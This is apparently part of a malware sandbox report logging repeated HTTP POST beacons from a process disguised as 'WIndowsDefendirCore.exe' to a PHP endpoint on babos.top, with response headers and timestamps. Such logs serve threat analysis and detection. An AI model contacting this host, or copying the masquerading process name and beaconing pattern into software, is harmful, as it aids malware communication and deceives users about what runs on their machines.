alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=35964&min_rtt=26176&rtt_var=8713&sent=119&recv=104&lost=0&retrans=12&sent_bytes=30419&recv_bytes=39603&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FVLGBgELX7ezKiLNRjUSDEdZwY%2B6Feoy45aCjsMq924b80UYQbDTJYvuLA1S%2Btnrx89HV%2FxvBr5HAinwPtPx6AilIOrSjoSnJ2q2d5QyTGvO%2FnqYOTcz6EdTZmU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f661e914f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=33828&min_rtt=26176&rtt_var=8626&sent=123&recv=108&lost=0&retrans=12&sent_bytes=31402&recv_bytes=41708&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuSpIyjmuOVb9Zw6XZGimv7K8X42v9a5fw0g8cwK8cp4uzN43TYl0yFFgFRe8SNLjP2peIE2nG3p4bShxzZgxgd10cw1dkoGglkNSRBcNase3aGw%2BypImbGkY6c%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f66de89af1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=33262&min_rtt=26176&rtt_var=7073&sent=127&recv=112&lost=0&retrans=12&sent_bytes=32381&recv_bytes=43813&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FJHiQwlwAQQTx3gu0NXdiUn9wDAZ8yd9nBlOQEe5RaVVnsZiiE6PGlv7%2B0GdxB6qs7nCP8qzb7E7vNUaqeWZsvnqJzUYNNXVEDGm6uDbpRUHNBG5uu815cPrZq8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f681a9e8f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=32687&min_rtt=26176&rtt_var=5725&sent=131&recv=116&lost=0&retrans=12&sent_bytes=33354&recv_bytes=45918&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iQZHpmBpJt4lo45cYHR8tRLBOy7V1mhbVS1PAmyyglKMiTxqX78HgHoNc3dGfIwPUl%2BQGtfTvdgHel2d2UXI2vhBGveMvw3yaFjZwwDVgRmauTtUQnHjEl%2B8KwI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f694e83cf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=35872&min_rtt=26176&rtt_var=9111&sent=135&recv=120&lost=0&retrans=12&sent_bytes=34327&recv_bytes=48023&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1828
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2Bo4iz8Zhez9X9Df%2BdhTmiKNJkLJ9xdfo3SsXjBwJFZfgsLjqYNdQnObXGGogIEBmB5bGX4sWj9bXcQUCYZHt07lhEwn4o5Q33zqI26uRYUrxKAIR4ulyB%2BaZII%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6a51e23f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=37021&min_rtt=26176&rtt_var=10623&sent=139&recv=124&lost=0&retrans=12&sent_bytes=35302&recv_bytes=50116&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYU6SenGq0x3U2eK3sU8EXFX82ru0jtfEeanNidduV7meYWlcK2zTNH0f1XZQR04T%2FcmwOvfjD0Dq0uphaFrpTUeaZU%2BeOloJXm%2BHOBiqC53Zh8YHJRAeGl1ThA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6b93a01f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=35757&min_rtt=26176&rtt_var=10494&sent=145&recv=128&lost=0&retrans=14&sent_bytes=37238&recv_bytes=52221&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pX5NRAHz6ckaRbN6rrWjBeUG1fVj9Mer8pqhCEQ6A6uN2sGPchyEBWzFUKj3MPoLTA207%2BKU5uScFhrT0w6%2BTK2oPvpO6UGwW54Y9Jg9KVY08rhY9MLDbKmgJmA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6cc8ad6f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=46616&min_rtt=26176&rtt_var=26346&sent=151&recv=133&lost=0&retrans=14&sent_bytes=38216&recv_bytes=54326&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t3bK5EM9g2wSBqtKGYWx2DN0nEcgtk6TiDnqSGbqPEIDspiYwnxjfVjkMaYFCR4IUF04hTe1Jg%2B8ZnWM2baTKsXchbCu9NyrNRgJasT8xr%2BRDLWU075qoSOBS04%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6d3fd0ff1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=43363&min_rtt=26176&rtt_var=20101&sent=155&recv=137&lost=0&retrans=14&sent_bytes=39192&recv_bytes=56431&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Raq%2FdVnM%2F9LPCp3Kg%2BT%2FiI%2Fwt4aZkVXdPDLRf0TaWQ2gy06t%2FK99b4oqXSV3%2FvHWMEeGb0v3fFgw17%2BQqIWLzLp4hkXxkcvAupIOi9qPrGcT5D1uqA6%2FSp2%2BXww%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6e1eee3f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=45249&min_rtt=26176&rtt_var=18848&sent=161&recv=142&lost=0&retrans=14&sent_bytes=40168&recv_bytes=58536&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PSX1iFpjan4GryU4p0lxqIBLGuEzegcPqhCmeS0K6rr9BI4%2Br5kFpq32UQAmJrRK9KfcZMtKdBt0Xq0YMnZjRY3kRVGkctoLQ34B2MfjfScU4l2UJ4KUhTwwupU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6fa3c8df1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=45249&min_rtt=26176&rtt_var=18848&sent=170&recv=145&lost=0&retrans=19&sent_bytes=43199&recv_bytes=60641&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NeN6j9noafSFYm6J%2BWHvq5qzZdx0xUyr%2FT9%2BM%2BiBepVLAOi11VDBFjjQJ3nVRlci7shdTikV1u3yplisrpgQM5bV6lUI3zwQhTbi5XcxLCEsK0fBbS%2BN09VPZa8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7104b6df1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=43224&min_rtt=26176&rtt_var=18187&sent=176&recv=149&lost=0&retrans=20&sent_bytes=44178&recv_bytes=62746&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ux%2FXlBseh%2FZP1QniX2ThbbhpipYCFuEhBFhSL9jiGzE%2FinBuDhktIFPMf9oRC1KL08tTva19mOm0FtidCHqlQP%2B9lGu26SuYk9nTO56bhkhbLbjJBwcRt0vTlFY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f71a1adcf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=39430&min_rtt=26176&rtt_var=16779&sent=180&recv=153&lost=0&retrans=20&sent_bytes=45160&recv_bytes=64851&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4uxu7wVcUCZ9RLNGr1S6u%2FGVXAw7IKNPsTxdYjarGAGNtMoTC7Gkf1F%2Fusxh7tz6H2dZ0F1laaADRXP42hTLOrwTCsUPi7HWRAtFh368Db99y2f650OL65E6ZE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f721af08f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=37405&min_rtt=26176&rtt_var=13238&sent=184&recv=157&lost=0&retrans=20&sent_bytes=46140&recv_bytes=66956&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=upMcd5BTybkJw8CLBuThtAev8hXGDH5QJCfv20JEpI1ZSP1GjMEAUc01qpsCGSExF8QjVNuz2RYn6Cr7vD%2BaghD261OvCeEIBzJQX9cRDD7dWZenA%2B7emsvIxR0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7294c60f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=36644&min_rtt=26176&rtt_var=11452&sent=190&recv=162&lost=0&retrans=21&sent_bytes=47141&recv_bytes=69061&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6eeeWJQn5NfxoRB8qBcefyncbKxxB1cnFi0sjIwQMxINR30rHAFFOuTVv5CHoSPC50IXrFz%2Bk2bulvtcZf%2B0npXOruA54zXqMr3tDiyGfzg6D2H12P918KSyDQM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f739e925f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=36343&min_rtt=26176&rtt_var=6970&sent=194&recv=165&lost=0&retrans=21&sent_bytes=48117&recv_bytes=71166&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1828
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CoEzT3IrO40wUdzqvuuH0bSCPcTg58OYMmhaElLOvZjZIepEE5uOcGIkMnlOJnScn789DJ5QVQgYJc9lJ%2FfQt91v2lnfmPqpNL8gTIJXGbFxsnmujzfs03UPkzY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f741fef1f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=71365&min_rtt=26176&rtt_var=61462&sent=201&recv=170&lost=0&retrans=21&sent_bytes=49092&recv_bytes=73259&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sox8S9dkFMWXDr6qX2xe4ySYvvU2B40%2BU%2B7F4of5O9fJ2tFjI4%2BStdoOAycqHDzzJ2nERwNWgzOk0%2B3oUVrYmnUpOu0cuA2gzbrmMfxouiscgbFVcc5gC2thGNo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f7518a4ef1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=78836&min_rtt=26176&rtt_var=61037&sent=208&recv=175&lost=0&retrans=22&sent_bytes=50071&recv_bytes=75364&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x19Qrjg92j6RNwaPA8NnbCmtiyy9K7zIGSpWfAAJ2Jdty21Nz%2B1dOnL8ZbLlWNt1dPX5NeL91J1YuwKK%2F5iqzvggvouqACRWZ0Y2tl%2BoRpzrVy8s%2BdOmLjMcMV4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f75b0b7df1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=81797&min_rtt=26176&rtt_var=51701&sent=215&recv=180&lost=0&retrans=25&sent_bytes=52966&recv_bytes=77469&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AxJafIt5oF0oVIflpqp%2BLipAbIL%2BT4YTJLfpLEpzNevD4W7DisMbnmvWT9VgAdwO4CKzChtKK4BLSnQrkK%2Fm%2FJ0QN0Ce3W09qALs9IPFXJDlPVQ9W%2BotzCvFdZY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f762ea3bf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=75020&min_rtt=26176&rtt_var=51780&sent=220&recv=184&lost=0&retrans=26&sent_bytes=53951&recv_bytes=79574&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:22:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mc1FQ1RR5hVDX1tYnMb6B%2F3c879v0TecbR40%2FNgdFa9YWwUBwDArVyzzi2%2BZjG3gh0qFBa80qtp37i2Igv2QZ%2BiyOkvN7jav8MbUU8H5z3ayLuTIXoEQSzFpQrA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f76aaf3bf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=64542&min_rtt=26176&rtt_var=47257&sent=224&recv=188&lost=0&retrans=26&sent_bytes=54933&recv_bytes=81679&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1840
Expect: 100-continue

Response

HTTP/1.1 200 OK

